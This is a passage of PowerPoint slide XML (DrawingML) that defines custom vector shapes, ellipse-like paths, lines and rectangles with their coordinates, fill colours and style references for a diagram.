          <a:xfrm>
            <a:off x="4946760" y="5183280"/>
            <a:ext cx="60120" cy="91800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="38" h="58">
                <a:moveTo>
                  <a:pt x="38" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="27"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="800000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="CustomShape 174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="5465880"/>
            <a:ext cx="28080" cy="50400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="600000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="CustomShape 175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4745160" y="4724280"/>
            <a:ext cx="441000" cy="124920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="278" h="79">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="C0C0C0"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="CustomShape 176"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5013360" y="4840200"/>
            <a:ext cx="171000" cy="93240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="108" h="59">
                <a:moveTo>
                  <a:pt x="1" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="108" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E0E0E0"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="CustomShape 177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4746600" y="4724280"/>
            <a:ext cx="272520" cy="207720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="172" h="131">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172" y="131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A0A0A0"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="CustomShape 178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508640" y="4205160"/>
            <a:ext cx="639360" cy="122040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="403" h="77">
                <a:moveTo>
                  <a:pt x="202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="CustomShape 179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508640" y="4205160"/>
            <a:ext cx="639360" cy="122040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="403" h="77">
                <a:moveTo>
                  <a:pt x="202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="337" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="14400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Line 180"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508280" y="4194000"/>
            <a:ext cx="1800" cy="76320"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="14400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Line 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148000" y="4194000"/>
            <a:ext cx="1800" cy="76320"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="14400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="CustomShape 182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508640" y="4194000"/>
            <a:ext cx="634680" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="CustomShape 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4861080" y="4222800"/>
            <a:ext cx="41040" cy="19800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3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396" name="CustomShape 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4502160" y="4105440"/>
            <a:ext cx="641160" cy="144000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="404" h="91">
                <a:moveTo>
                  <a:pt x="202" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="34"/>
                </a:lnTo>
                <a:lnTo>
